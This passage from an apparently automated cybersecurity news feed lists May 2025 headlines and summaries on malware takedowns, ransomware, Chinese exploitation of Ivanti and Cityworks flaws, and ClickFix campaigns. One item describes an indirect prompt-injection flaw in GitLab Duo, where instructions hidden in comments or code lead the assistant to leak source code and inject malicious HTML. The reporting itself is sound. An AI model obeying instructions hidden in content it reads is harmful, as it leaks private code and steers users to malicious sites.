Autosummary: The attacks, like those that have deployed Winos 4.0 in the past, appear to focus specifically on Chinese-speaking environments, with the cybersecurity company calling out the "careful, long-term planning" by a very capable threat actor.


Operation ENDGAME disrupted global ransomware infrastructure

exploits ransomware
2025-05-25 https://securityaffairs.com/178245/cyber-crime/operation-endgame-disrupted-global-ransomware-infrastructure.html
Operation ENDGAME dismantled key ransomware infrastructure, taking down 300 servers, 650 domains, and seizing €21.2M in crypto. From May 19 to 22, 2025, Operation ENDGAME, coordinated by Europol and Eurojust, disrupted global ransomware infrastructure. Law enforcement took down 300 servers and 650 domains and issued 20 international arrest warrants. “A Command Post was set […]

Autosummary: Neutralized strains include Bumblebee, Latrodectus, Qakbot, Hijackloader, DanaBot, Trickbot, and Warmcookie, all commonly used in ransomware-as-a-service schemes.


SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 46

exploits
2025-05-25 https://securityaffairs.com/178265/breaking-news/security-affairs-malware-newsletter-round-46.html
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: Sarcoma Ransomware Unveiled: Anatomy of a Double Extortion Gang; RVTools Bumblebee Malware Attack – How a Trusted IT Tool Became a Malware Delivery Vector; Malicious ‘Checker’ Packages on PyPI Probe TikTok and Instagram for Valid Accounts […]


Fake Zenmap. WinMRT sites target IT staff with Bumblebee malware

exploits
2025-05-24 https://www.bleepingcomputer.com/news/security/bumblebee-malware-distributed-via-zenmap-winmrt-seo-poisoning/
The Bumblebee malware SEO poisoning campaign uncovered earlier this week impersonating RVTools is using more typosquatting domains mimicking other popular open-source projects to infect devices used by IT staff. [...]

Autosummary: [Image: Google Search results (Source: BleepingComputer)] BleepingComputer's tests show that if you visit the fake Zenmap site directly, it shows several AI-generated articles instead. [Image: Innocuous blog loading on direct hits (Source: BleepingComputer)]


Outsourcing cybersecurity: How SMBs can make smart moves

ciber
2025-05-23 https://www.helpnetsecurity.com/2025/05/23/smbs-outsourcing-cybersecurity/

Outsourcing cybersecurity can be a practical and affordable option. It allows small businesses to get the protection they need without straining their budgets, freeing up time and resources to focus on core operations. 76% of SMBs lack the in-house skills to properly address security issues, increasing demand for the expertise and services of MSPs, and 78% are concerned that a severe cyberattack could drive them out of operation, according to ConnectWise. What you can outsource … More

Autosummary: 76% of SMBs lack the in-house skills to properly address security issues, increasing demand for the expertise and services of MSPs, and 78% are concerned that a severe cyberattack could drive them out of operation, according to ConnectWise. Crisis response and decision-making: during an incident, vendors can execute containment and recovery, but only your leadership can make key decisions, such as public disclosures or operational shutdowns. Even if a vendor manages backups or platforms, you should maintain the keys, including credentials, encryption policies, and recovery processes.


CISA Warns of Suspected Broader SaaS Attacks Exploiting App Secrets and Cloud Misconfigs

exploits
2025-05-23 https://thehackernews.com/2025/05/cisa-warns-of-suspected-broader-saas.html
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday revealed that Commvault is monitoring cyber threat activity targeting applications hosted in their Microsoft Azure cloud environment. "Threat actors may have accessed client secrets for Commvault's (Metallic) Microsoft 365 (M365) backup software-as-a-service (SaaS) solution, hosted in Azure," the agency said. "This


GitLab Duo Vulnerability Enabled Attackers to Hijack AI Responses with Hidden Prompts

exploits
2025-05-23 https://thehackernews.com/2025/05/gitlab-duo-vulnerability-enabled.html
Cybersecurity researchers have discovered an indirect prompt injection flaw in GitLab's artificial intelligence (AI) assistant Duo that could have allowed attackers to steal source code and inject untrusted HTML into its responses, which could then be used to direct victims to malicious websites. GitLab Duo is an artificial intelligence (AI)-powered coding assistant that enables users to write,

Autosummary: "For organizations, this means that private information such as internal rules, functionalities, filtering criteria, permissions, and user roles can be leaked," Trend Micro said in a report published earlier this month. "Duo analyzes the entire context of the page, including comments, descriptions, and the source code — making it vulnerable to injected instructions hidden anywhere in that context," security researcher Omer Mayraz said.


Chinese threat actors exploited Trimble Cityworks flaw to breach U.S. local government networks

exploits government
2025-05-23 https://securityaffairs.com/178203/hacking/chinese-threat-actors-exploited-trimble-cityworks-flaw-to-breach-u-s-local-government-networks.html
A Chinese threat actor, tracked as UAT-6382, exploited a patched Trimble Cityworks flaw to deploy Cobalt Strike and VShell. Cisco Talos researchers attribute the exploitation of the CVE-2025-0994 in Trimble Cityworks to Chinese-speaking threat actor UAT-6382, based on tools and TTPs used in the intrusions. The vulnerability CVE-2025-0994 (CVSS v4 score of 8.6) is a […]


TikTok videos now push infostealer malware in ClickFix attacks

exploits
2025-05-23 https://www.bleepingcomputer.com/news/security/tiktok-videos-now-push-infostealer-malware-in-clickfix-attacks/
Cybercriminals are using TikTok videos to trick users into infecting themselves with Vidar and StealC information-stealing malware in ClickFix attacks. [...]

Autosummary: After being deployed, Vidar can take desktop screenshots and steal credentials, credit cards, cookies, cryptocurrency wallets, text files, and Authy 2FA authenticator databases.


Police takes down 300 servers in ransomware supply-chain crackdown

exploits ransomware
2025-05-23 https://www.bleepingcomputer.com/news/security/police-takes-down-300-servers-in-ransomware-supply-chain-crackdown/
In the latest phase of Operation Endgame, an international law enforcement operation, national authorities from seven countries seized 300 servers and 650 domains used to launch ransomware attacks. [...]

Autosummary: Previous Operation Endgame actions: This week's action follows multiple other Operation Endgame phases, including the seizure of over 100 servers hosting over 2,000 domains used by multiple malware loader operations, including IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC.


SafeLine WAF: Open Source Web Application Firewall with Zero-Day Detection and Bot Protection

exploits
2025-05-23 https://thehackernews.com/2025/05/safeline-waf-open-source-web.html
From zero-day exploits to large-scale bot attacks — the demand for a powerful, self-hosted, and user-friendly web application security solution has never been greater. SafeLine is currently the most starred open-source Web Application Firewall (WAF) on GitHub, with over 16.4K stars and a rapidly growing global user base. This walkthrough covers what SafeLine is, how it works, and why it’s

Autosummary: It's particularly well-suited for: organizations with strict data privacy or regulatory compliance requirements; teams targeted by sophisticated bots and automated threats; small and medium-sized businesses seeking affordable, enterprise-grade protection; DevOps and security teams requiring full deployment control and customization; and projects requiring rapid deployment and easy maintenance. Final Words: SafeLine stands out as a powerful, open-source alternative to traditional cloud-based WAFs. Key Features of SafeLine WAF, Comprehensive Attack Prevention: SafeLine effectively blocks a wide range of common and advanced web attacks, including SQL injection (SQLi), cross-site scripting (XSS), OS command injection, CRLF injection, XML External Entity (XXE) attacks, Server Side Request Forgery (SSRF), and directory traversal. With cutting-edge zero-day detection, robust bot mitigation, and zero trust–aligned identity features—all bundled into a self-hosted, easy-to-deploy package—SafeLine empowers developers, security teams, and organizations of all sizes to take control of their web security.


U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cybercrime Operation

exploits
2025-05-23 https://thehackernews.com/2025/05/us-dismantles-danabot-malware-network.html
The U.S. Department of Justice (DoJ) on Thursday announced the disruption of the online infrastructure associated with DanaBot (aka DanaTools) and unsealed charges against 16 individuals for their alleged involvement in the development and deployment of the malware, which it said was controlled by a Russia-based cybercrime organization. The malware, the DoJ said, infected more than 300,000

Autosummary: The malware's infrastructure consists of multiple components: a "bot" that infects target systems and performs data collection, an "OnlineServer" that manages the RAT functionalities, a "client" for processing collected logs and bot management, and a "server" that handles bot generation, packing, and C2 communication. DanaBot has been used in targeted espionage attacks against government officials in the Middle East and Eastern Europe. The authors of DanaBot operate as a single group, offering the malware for rent to potential affiliates, who subsequently use it for their own malicious purposes by establishing and managing their own botnets using private servers. DanaBot's developers have partnered with the authors of several malware cryptors and loaders, such as Matanbuchus, and offered special pricing for distribution bundles. DanaBot maintained an average of 150 active tier-1 C2 servers per day, with approximately 1,000 daily victims across more than 40 countries, making it one of the largest MaaS platforms active in 2025. Proofpoint, which first identified and named DanaBot in May 2018, said the disruption of the MaaS operation is a win for defenders and that it will have an impact on the cybercriminal threat landscape. [Figure: High-level diagram of multi-tiered C2 architecture] The DoJ further credited several private sector firms, Amazon, CrowdStrike, ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, Spycloud, Team Cymru, and Zscaler, for providing "valuable assistance."
Some of the noteworthy aspects of DanaBot, compiled from various reports, are below - DanaBot's sub-botnet 5 received commands to download a Delphi-based executable leveraged to conduct HTTP-based distributed denial-of-service (DDoS) attacks against the Ukrainian Ministry of Defence (MOD) webmail server and the National Security and Defense Council (NSDC) of Ukraine in March 2022, shortly after Russia's invasion of the country. Two DanaBot sub-botnets, 24 and 25, were specifically used for espionage purposes, likely with an aim to further intelligence-gathering activities on behalf of Russian government interests. DanaBot operators have periodically restructured their offering since 2022 to focus on defense evasion, with at least 85 distinct build numbers identified to date (the most recent version is 4006, which was compiled in March 2025).


3AM ransomware attack poses as a call from IT support to compromise networks

exploits ransomware
2025-05-23 https://www.tripwire.com/state-of-security/3am-ransomware-attackers-pose-it-support-compromise-networks
Cybercriminals are getting smarter. Not by developing new types of malware or exploiting zero-day vulnerabilities, but by simply pretending to be helpful IT support desk workers. Find out how they do it in my article on the Tripwire State of Security blog. "

Autosummary: As security firm Sophos explains, a virtual machine is deployed on the compromised computer, in an attempt to evade detection from security software, and the attackers roll out a series of commands to create new user accounts and gain admin privileges. "


TikTok videos + ClickFix tactic = Malware infection

exploits
2025-05-23 https://www.helpnetsecurity.com/2025/05/23/tiktok-videos-clickfix-tactic-infostealer-malware-infection/

Malware peddlers are using TikTok videos and the ClickFix tactic to trick users into installing infostealer malware on their computers, Trend Micro researchers have warned. The videos are getting published by a number of TikTok user accounts, seem AI-made, and are apparently attracting a large audience. “The videos [verbally] instruct viewers to run a sequence of commands to purportedly activate legitimate software, such as Windows OS, Microsoft Office, CapCut, and Spotify,” the researchers noted. “The … More

The post TikTok videos + ClickFix tactic = Malware infection appeared first on Help Net Security.

"

Autosummary: "


300 Servers and €3.5M Seized as Europol Strikes Ransomware Networks Worldwide

exploits ransomware
2025-05-23 https://thehackernews.com/2025/05/300-servers-and-35m-seized-as-europol.html
As part of the latest "season" of Operation Endgame, a coalition of law enforcement agencies have taken down about 300 servers worldwide, neutralized 650 domains, and issued arrest warrants against 20 targets. Operation Endgame, first launched in May 2024, is an ongoing law enforcement operation targeting services and infrastructures assisting in or directly providing initial or consolidating "

Autosummary: Iskander Rifkatovich Sharafetdinov (aka alik, gucci), 32, a member of the TrickBot group; Mikhail Mikhailovich Tsarev (aka mango), 36, a member of the TrickBot group; Maksim Sergeevich Galochkin (aka bentley, manuel, Max17, volhvb, crypt), 43, a member of the TrickBot group; Vitalii Nikolaevich Kovalev (aka stern, ben, Grave, Vincent, Bentley, Bergen, Alex Konor), 36, a member of the TrickBot group. The disclosure comes as Europol took the wraps off a large-scale law enforcement operation that resulted in 270 arrests of dark web vendors and buyers across 10 countries: the United States (130), Germany (42), the United Kingdom (37), France (29), South Korea (19), Austria (4), the Netherlands (4), Brazil (3), Switzerland (1), and Spain (1). "


Hackers Use TikTok Videos to Distribute Vidar and StealC Malware via ClickFix Technique

exploits
2025-05-23 https://thehackernews.com/2025/05/hackers-use-tiktok-videos-to-distribute.html
The malware known as Latrodectus has become the latest to embrace the widely-used social engineering technique called ClickFix as a distribution vector. "The ClickFix technique is particularly risky because it allows the malware to execute in memory rather than being written to disk," Expel said in a report shared with The Hacker News. "This removes many opportunities for browsers or security "

Autosummary: Incidentally, the malware is one among the many malicious software to suffer an operational setback as part of Operation Endgame, which took down 300 servers worldwide and neutralized 650 domains related to Bumblebee, Latrodectus, QakBot, HijackLoader, DanaBot, TrickBot, and WARMCOOKIE between May 19 and 22, 2025. "


CTM360 report: Ransomware exploits trust more than tech

exploits ransomware
2025-05-22 https://www.helpnetsecurity.com/2025/05/22/ctm360-report-ransomware-attacks/

A recent wave of ransomware attacks has disrupted major retailers across the UK. According to a new report from CTM360, the attackers didn’t need to break down the door, they were invited in through misplaced trust and weak identity safeguards. This wasn’t about advanced malware or zero-day vulnerabilities. The attackers used common tactics: impersonating IT staff, tricking employees into handing over credentials, and intercepting multi-factor authentication codes. From there, they moved across networks. What went … More

The post CTM360 report: Ransomware exploits trust more than tech appeared first on Help Net Security.

"

Autosummary: What CISOs should focus on: the report recommends seeing the organization from an attacker’s perspective; reducing digital exposure across identity and supply chain systems; reviewing remote access practices; applying focused hardening policies that are easy to enforce; and auditing how internal trust boundaries are managed. Download CTM360’s How To Harden Against Ransomware report and discover how ransomware groups are exploiting identity systems instead of technical flaws. These attacks succeeded not because defences failed, but because basic trust was abused: trust in employees to recognize phishing attempts, trust in identity systems to block unauthorised access, and trust in remote access tools that attackers easily repurposed. "


Unpatched critical bugs in Versa Concerto lead to auth bypass, RCE

exploits
2025-05-22 https://www.bleepingcomputer.com/news/security/unpatched-critical-bugs-in-versa-concerto-lead-to-auth-bypass-rce/
Critical vulnerabilities in Versa Concerto that are still unpatched could allow remote attackers to bypass authentication and execute arbitrary code on affected systems. [...] "

Autosummary: Attackers can overwrite a binary like "test" with a reverse shell script, which is then executed by a host cron job, resulting in full host compromise. The researchers created a video to demonstrate how CVE-2025-34027 could be exploited in attacks. ProjectDiscovery reported the vulnerabilities to the vendor on February 13, with a 90-day disclosure period. "


Scammers are using AI to impersonate senior officials, warns FBI

financial
2025-05-22 https://www.malwarebytes.com/blog/news/2025/05/scammers-are-using-ai-to-impersonate-senior-officials-warns-fbi
Cybercriminals are using AI-based tools to generate voice clones of the voices of senior US officials in order to scam people. "

Autosummary: A vishing attack is a type of phishing attack in which a threat actor uses social engineering tactics via voice communication to scam a target—the word “vishing” is a combination of “voice” and “phishing.” "


FBI and Europol Disrupt Lumma Stealer Malware Network Linked to 10 Million Infections

exploits
2025-05-22 https://thehackernews.com/2025/05/fbi-and-europol-disrupt-lumma-stealer.html
A sprawling operation undertaken by global law enforcement agencies and a consortium of private sector firms has disrupted the online infrastructure associated with a commodity information stealer known as Lumma (aka LummaC or LummaC2), seizing 2,300 domains that acted as the command-and-control (C2) backbone to commandeer infected Windows systems. "Malware like LummaC2 is deployed to steal "

Autosummary: The stealer is typically bundled with spoofed software or cracked versions of popular commercial software, targeting users looking to avoid paying for legitimate licenses. The operators have created a Telegram marketplace with a rating system for affiliates to sell stolen data without intermediaries. The core binary is obfuscated with advanced protection such as low-level virtual machine (LLVM core), Control Flow Flattening (CFF), Control Flow Obfuscation, customized stack decryption, huge stack variables, and dead code, among others, to make static analysis difficult. There were more than 21,000 market listings selling Lumma Stealer logs on multiple cybercriminal forums from April through June of 2024, a 71.7% increase from April through June of 2023. "The Lumma Stealer distribution infrastructure is flexible and adaptable," Microsoft said. The Windows maker, which is tracking the threat actor behind the stealer under the name Storm-2477, said its distribution infrastructure is both "dynamic and resilient," leveraging a combination of phishing, malvertising, drive-by download schemes, abuse of trusted platforms, and traffic distribution systems like Prometheus. "


Russia-linked APT28 targets western logistics entities and technology firms

industry
2025-05-22 https://securityaffairs.com/178165/apt/russia-linked-apt28-targets-western-logistics-entities-and-technology-firms.html
CISA warns Russia-linked group APT28 is targeting Western logistics and tech firms aiding Ukraine, posing an elevated threat to supply chains. Russia-linked cyberespionage group APT28 intensifies its operations against Western logistics and technology companies moving supplies into Ukraine, US CISA warns. The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it […] "

Autosummary: APT28 used various methods for initial access, including brute-force attacks, spear-phishing, and exploiting known vulnerabilities in Outlook, Roundcube, WinRAR, VPNs, and SOHO devices. The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. "


Ivanti EPMM flaw exploited by Chinese hackers to breach govt agencies

exploits
2025-05-22 https://www.bleepingcomputer.com/news/security/ivanti-epmm-flaw-exploited-by-chinese-hackers-to-breach-govt-agencies/
Chinese hackers have been exploiting a remote code execution flaw in Ivanti Endpoint Manager Mobile (EPMM) to breach high-profile organizations worldwide. [...] "

Autosummary: The entities targeted in the latest UNC5221 exploitation campaign are: UK National Health Service institutions; national healthcare/pharma provider in North America; U.S. medical device manufacturer; municipal agencies in Scandinavia and the UK; German Federal Research Institute; German telecommunications giant and IT subsidiaries; U.S.-based cybersecurity firm; major U.S. foodservice distributor; Irish aerospace leasing firm; German industrial manufacturer; Japanese automotive electronics and powertrain supplier; U.S. firearms manufacturer; South Korean multinational commercial and consumer bank. These were confirmed breaches, as evidenced by reverse shells, data exfiltration/database exports, persistent malware injections, and abuse of internal Office 365 tokens and LDAP configurations. "


Chinese hackers breach US local governments using Cityworks zero-day

exploits government
2025-05-22 https://www.bleepingcomputer.com/news/security/chinese-hackers-breach-us-local-governments-using-cityworks-zero-day/
Chinese-speaking hackers have exploited a now-patched Trimble Cityworks zero-day to breach multiple local governing bodies across the United States. [...] "

Autosummary: "


Stalkerware apps go dark after data breach

financial
2025-05-22 https://www.malwarebytes.com/blog/news/2025/05/stalkerware-apps-go-dark-after-data-breach
A stalkerware company that recently leaked millions of users' personal information online has taken all of its assets offline without any explanation. "

Autosummary: Other apps now taken down that the company claimed to have operated include Spyier, Neatspy, Fonemonitor, Spyine, and Minspy. The flaw exposed data from the victim’s devices, rendering their messages, photos, and location data visible to whomever wanted them. "


DOJ charges 12 more in $263 million crypto fraud takedown where money was hidden in squishmallow stuffed animals

financial
2025-05-22 https://www.bitdefender.com/en-us/blog/hotforsecurity/doj-charges-12-263-million-crypto-fraud-takedown-where-money-hidden-squishmallow-stuffed-animals
Crypto fraud meets cuddly toys! US authorities have charged a group accused of stealing $263 million in cryptocurrency - and then laundering the cash by stuffing it into Squishmallows. Read more in my article on the Hot for Security blog. "

Autosummary: For instance, Lam is said to have purchased at least 31 luxury vehicles, including custom Lamborghinis, Ferraris, Porsches, Mercedes G Wagons, a Rolls-Royce, and a McLaren - some of which have been valued at over US $3 million. "


Critical Windows Server 2025 dMSA Vulnerability Enables Active Directory Compromise

exploits
2025-05-22 https://thehackernews.com/2025/05/critical-windows-server-2025-dmsa.html
A privilege escalation flaw has been demonstrated in Windows Server 2025 that makes it possible for attackers to compromise any user in Active Directory (AD). "The attack exploits the delegated Managed Service Account (dMSA) feature that was introduced in Windows Server 2025, works with the default configuration, and is trivial to implement," Akamai security researcher Yuval Gordon said in a "

Autosummary: The problem identified by Akamai is that during the dMSA Kerberos authentication phase, the Privilege Attribute Certificate (PAC) embedded into a ticket-granting ticket (i.e., credentials used to verify identity) issued by a key distribution center (KDC) includes both the dMSA's security identifier (SID) as well as the SIDs of the superseded service account and of all its associated groups. "


Chinese Hackers Exploit Ivanti EPMM Bugs in Global Enterprise Network Attacks

exploits
2025-05-22 https://thehackernews.com/2025/05/chinese-hackers-exploit-ivanti-epmm.html
A recently patched pair of security flaws affecting Ivanti Endpoint Manager Mobile (EPMM) software has been exploited by a China-nexus threat actor to target a wide range of sectors across Europe, North America, and the Asia-Pacific region. The vulnerabilities, tracked as CVE-2025-4427 (CVSS score: 5.3) and CVE-2025-4428 (CVSS score: 7.2), could be chained to execute arbitrary code on a "

Autosummary: The Dutch cybersecurity company said the earliest exploitation activity dates back to May 15, 2025, with the attacks targeting healthcare, telecommunications, aviation, municipal government, finance, and defense sectors. "


Webinar: Learn How to Build a Reasonable and Legally Defensible Cybersecurity Program

ciber
2025-05-22 https://thehackernews.com/2025/05/webinar-learn-how-to-build-reasonable.html
It’s not enough to be secure. In today’s legal climate, you need to prove it. Whether you’re protecting a small company or managing compliance across a global enterprise, one thing is clear: cybersecurity can no longer be left to guesswork, vague frameworks, or best-effort intentions. Regulators and courts are now holding organizations accountable for how “reasonable” their security programs are "

Autosummary: In this live session, CIS experts will walk you through a practical, no-fluff approach to building a cybersecurity program that meets legal and industry standards—and makes sense for your size, scope, and resources. "


Joy as Colombian boy, 11, freed after 18 days in rebel captivity

latam
2025-05-22 https://www.bbc.com/news/articles/clynlnlxw03o
He was seized by masked armed men at his home in what is believed to have been a kidnapping for ransom. "

Autosummary: The freed boy was reunited with his mother and other family members. Rebel groups in Colombia are notorious for forcibly recruiting children, but the boy's abduction from his home at gunpoint nevertheless shocked locals. "


Unpatched Windows Server vulnerability allows full domain compromise

exploits
2025-05-22 https://www.helpnetsecurity.com/2025/05/22/unpatched-windows-server-vulnerability-allows-active-directory-users-full-domain-compromise/

A privilege escalation vulnerability in Windows Server 2025 can be used by attackers to compromise any user in Active Directory (AD), including Domain Admins. “The [“BadSuccessor”] attack exploits the delegated Managed Service Account (dMSA) feature that was introduced in Windows Server 2025, works with the default configuration, and is trivial to implement,” Akamai researcher Yuval Gordon warned. BadSuccessor attack technique explained. The exploitable feature was introduced to help organizations replace the legacy non-managed service accounts … More

The post Unpatched Windows Server vulnerability allows full domain compromise appeared first on Help Net Security.

"

Autosummary: “The [“BadSuccessor”] attack exploits the delegated Managed Service Account (dMSA) feature that was introduced in Windows Server 2025, works with the default configuration, and is trivial to implement,” Akamai researcher Yuval Gordon warned. "


Chinese Hackers Exploit Trimble Cityworks Flaw to Infiltrate U.S. Government Networks

exploits government
2025-05-22 https://thehackernews.com/2025/05/chinese-hackers-exploit-trimble.html
A Chinese-speaking threat actor tracked as UAT-6382 has been linked to the exploitation of a now-patched remote-code-execution vulnerability in Trimble Cityworks to deliver Cobalt Strike and VShell. "UAT-6382 successfully exploited CVE-2025-0944, conducted reconnaissance, and rapidly deployed a variety of web shells and custom-made malware to maintain long-term access," Cisco Talos researchers "

Autosummary: "


US indicts leader of Qakbot botnet linked to ransomware attacks

exploits ransomware
2025-05-22 https://www.bleepingcomputer.com/news/security/us-indicts-leader-of-qakbot-botnet-linked-to-ransomware-attacks/
The U.S. government has indicted Russian national Rustam Rafailevich Gallyamov, the leader of the Qakbot botnet malware operation that compromised over 700,000 computers and enabled ransomware attacks. [...] "

Autosummary: Starting in 2019, Qakbot became the initial infection vector in many ransomware attacks from infamous gangs such as Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, Doppelpaymer, Black Basta, and Cactus. "


U.S. CISA adds a Samsung MagicINFO 9 Server flaw to its Known Exploited Vulnerabilities catalog

exploits
2025-05-22 https://securityaffairs.com/178194/hacking/cisa-adds-a-samsung-magicinfo-9-server-flaw-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Samsung MagicINFO 9 Server vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Samsung MagicINFO 9 Server vulnerability, tracked as CVE-2025-4632 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is an improper limitation of a pathname […] "

Autosummary: "


Why so many military veterans move into cybersecurity

ciber
2025-05-22 https://www.bbc.com/news/articles/ce3vgjzwl04o
The vigilance needed in the military can be an asset in the cybersecurity industry. "

Autosummary: But, Mrs Morin adds, "The camaraderie is exactly like the military, the busy weeks, the quiet weeks, the jokes that nobody gets unless you've been there done that… It's just a really tight knit community." In addition, he says, military personnel always think in terms of "risk, defence in depth, layers of defence". But, says former infantryman James Murphy, when you see a trashcan by the side of the road, and you know no-one is collecting rubbish that day: "The spider hairs on the back of your neck start tingling." "


AutoPatchBench: Meta’s new way to test AI bug fixing tools

exploits
2025-05-21 https://www.helpnetsecurity.com/2025/05/21/autopatchbench-meta-test-ai-bug-fixing-tools/

AutoPatchBench is a new benchmark that tests how well AI tools can fix code bugs. It focuses on C and C++ vulnerabilities found through fuzzing. The benchmark includes 136 real bugs and their verified fixes, taken from the ARVO dataset. (Figure: Patch generation flowchart.) CyberSecEval 4. AutoPatchBench is part of Meta’s CyberSecEval 4, a benchmark designed to objectively evaluate and compare various LLM-based auto-patching agents for vulnerabilities specifically identified via fuzzing, a widely used method of … More

The post AutoPatchBench: Meta’s new way to test AI bug fixing tools appeared first on Help Net Security.

"

Autosummary: (Figure: Patch generation flowchart.) CyberSecEval 4. AutoPatchBench is part of Meta’s CyberSecEval 4, a benchmark designed to objectively evaluate and compare various LLM-based auto-patching agents for vulnerabilities specifically identified via fuzzing, a widely used method of automated security testing. "


Nation-state APTs ramp up attacks on Ukraine and the EU

government
2025-05-21 https://www.helpnetsecurity.com/2025/05/21/apt-groups-attacks-eu-ukraine/

Russian APT groups intensified attacks against Ukraine and the EU, exploiting zero-day vulnerabilities and deploying wipers, according to ESET. Ukraine faces rising cyber threats. The Russia-aligned Sandworm group intensified destructive operations against Ukrainian energy companies, deploying a new wiper named ZEROLOT. Gamaredon remained the most prolific actor targeting Ukraine, enhancing malware obfuscation and introducing PteroBox, a file stealer leveraging Dropbox. “The infamous Sandworm group concentrated heavily on compromising Ukrainian energy infrastructure. In recent cases, it … More

The post Nation-state APTs ramp up attacks on Ukraine and the EU appeared first on Help Net Security.

"

Autosummary: Meanwhile, other North Korea-aligned groups saw fluctuations in their operational tempo: In early 2025, Kimsuky and Konni returned to their usual activity levels after a noticeable decline at the end of 2024, shifting their targeting away from English-speaking think tanks, NGOs, and North Korea experts to focus primarily on South Korean entities and diplomatic personnel; and Andariel resurfaced, after a year of inactivity, with a sophisticated attack against a South Korean industrial software company. "


SK Telecom revealed that malware breach began in 2022

exploits Telcos
2025-05-21 https://securityaffairs.com/178120/data-breach/sk-telecom-revealed-that-malware-breach-began-in-2022.html
South Korean mobile network operator SK Telecom revealed that the security breach disclosed in April began in 2022. SK Telecom is South Korea’s largest wireless telecom company, a major player in the country’s mobile and tech landscape. It holds about 48% of the market share for mobile services, meaning around 34 million subscribers use its […] "

Autosummary: “The personal information that has been confirmed to have been leaked so far is a total of 25 types, including users’ mobile phone numbers, IMSI (subscriber identification number), SIM authentication keys, and other SIM-related information that were stored in HSS*.” The company offers cellular service, along with 5G development, AI services, IoT solutions, cloud computing, and smart city infrastructure. "


Marks & Spencer faces $402 million profit hit after cyberattack

ciber
2025-05-21 https://www.bleepingcomputer.com/news/security/marks-and-spencer-faces-402-million-profit-hit-after-cyberattack/
British retailer giant Marks & Spencer (M&S) is bracing for a potential profit hit of up to £300 million ($402 million) following a recent cyberattack that led to widespread operational and sales disruptions. [...] "

Autosummary: "In Fashion, Home & Beauty, online sales and trading profit have been heavily impacted by the necessary decision to pause online shopping, however stores have remained resilient. "


Coinbase says recent data breach impacts 69,461 customers

financial
2025-05-21 https://www.bleepingcomputer.com/news/security/coinbase-says-recent-data-breach-impacts-69-461-customers/
Coinbase, a cryptocurrency exchange with over 100 million customers, revealed that a recent data breach in which cybercriminals stole customer and corporate data affected 69,461 individuals [...] "

Autosummary: "


Strider Spark protects organizations from state-sponsored threats

government
2025-05-21 https://www.helpnetsecurity.com/2025/05/21/strider-spark/

Strider announced new capabilities for Spark, the company’s proprietary AI-powered intelligence engine that is transforming how organizations identify and mitigate risks associated with state-sponsored threats. Industry, government, and academic organizations are vulnerable to ongoing nation-state operations that target and compromise networks, intellectual property, people, and supply chains. Spark delivers detailed threat analysis within seconds to provide organizations with deeper insights into the risk environment through a streamlined interface that includes intuitive, query-based exploration. Spark enables … More

The post Strider Spark protects organizations from state-sponsored threats appeared first on Help Net Security.

"

Autosummary: More specifically, Spark enables users to illuminate and accelerate essential risk intelligence: Spark cuts through scattered signals, noise, and data overload to uncover potential state-sponsored threats linked to individuals, organizations, and technology. Today, Spark delivers the familiar AI interface features like natural language search, real-time analysis, suggested searches, threaded replies, multilingual input, and more. "


Researchers Expose PWA JavaScript Attack That Redirects Users to Adult Scam Apps

financial
2025-05-21 https://thehackernews.com/2025/05/researchers-expose-pwa-javascript.html
Cybersecurity researchers have discovered a new campaign that employs malicious JavaScript injections to redirect site visitors on mobile devices to a Chinese adult-content Progressive Web App (PWA) scam. "While the payload itself is nothing new (yet another adult gambling scam), the delivery method stands out," c/side researcher Himanshu Anand said in a Tuesday analysis. "The malicious landing "

Autosummary: "


Gunman kills Mexico City mayor's top aides in roadside attack

latam government
2025-05-21 https://www.bbc.com/news/articles/cyvmm275j1go
The mayor's private secretary and top adviser were shot dead on a busy road during the morning commute. "

Autosummary: The mayor's private secretary, Ximena Guzmán, and Brugada's adviser, José Muñoz, were killed on their way to work on Tuesday morning local time. "


European Union sanctions Stark Industries for enabling cyberattacks

ciber
2025-05-21 https://www.bleepingcomputer.com/news/security/european-union-sanctions-stark-industries-for-enabling-cyberattacks/
The European Union has imposed strict sanctions against web-hosting provider Stark Industries and the two individuals running it, CEO Iurie Neculiti and owner Ivan Neculiti, for enabling "destabilising activities" against the Union. [...] "

Autosummary: “They have been acting as enablers of various Russian state-sponsored and affiliated actors to conduct destabilising activities including, information manipulation interference and cyber-attacks against the Union and third countries” - Council of the European Union. Stark Industries is incorporated in the United Kingdom and provides VPS/VDS servers in the UK, the Netherlands, Germany, France, Turkey, and the U.S. The company provides multiple payment methods, including Bitcoin, Monero, Dash, and Ether cryptocurrency, typically used to hide payment origin. "


Kettering Health hit by system-wide outage after ransomware attack

exploits ransomware
2025-05-21 https://www.bleepingcomputer.com/news/security/kettering-health-hit-by-system-wide-outage-after-ransomware-attack/
Kettering Health, a healthcare network that operates 14 medical centers in Ohio, was forced to cancel inpatient and outpatient procedures following a cyberattack that caused a system-wide technology outage. [...] "

Autosummary: "While it is customary for Kettering Health to contact patients by phone to discuss payment options for medical bills, out of an abundance of caution, we will not be making calls to ask for or receive payment over the phone until further notice," it added. "


PureRAT Malware Spikes 4x in 2025, Deploying PureLogs to Target Russian Firms

exploits rusia-ucrania
2025-05-21 https://thehackernews.com/2025/05/purerat-malware-spikes-4x-in-2025.html
Russian organizations have become the target of a phishing campaign that distributes malware called PureRAT, according to new findings from Kaspersky. "The campaign aimed at Russian business began back in March 2023, but in the first third of 2025 the number of attacks quadrupled compared to the same period in 2024," the cybersecurity vendor said. The attack chains, which have not been "

Autosummary: "


Fake Kling AI Facebook Ads Deliver RAT Malware to Over 22 Million Potential Victims

exploits
2025-05-21 https://thehackernews.com/2025/05/fake-kling-ai-facebook-ads-deliver-rat.html
